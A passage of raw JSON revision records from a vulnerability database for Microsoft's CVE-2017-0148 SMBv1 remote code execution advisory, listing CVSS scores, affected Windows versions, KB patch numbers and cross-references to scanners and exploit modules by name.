"Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T06:59:52", "differentElements": ["msAffectedSoftware"], "edition": 43}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-13T10:45:10", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3205409", "KB3177186", "KB4012598", "KB4012216", "KB4012217", "KB4013429", "KB3210720", "KB4012212", "KB3205401", "KB4012213", "KB4012606", "KBMS16-110, 3187754", "KB4012215", "KB4013198", "KB3210721", "KB3212646", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T10:45:10", "differentElements": ["msAffectedSoftware"], "edition": 44}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-14T02:48:57", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012598", "KB3210721", "KB4013429", "KB4012212", "KB3205409", "KB4012606", "KB4012216", 
"KB4012217", "KB4012215", "KB3205401", "KB4013198", "KB3212646", "KB4012213", "KB3210720", "KB3177186", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T02:48:57", "differentElements": ["msAffectedSoftware"], "edition": 45}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-14T04:52:34", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
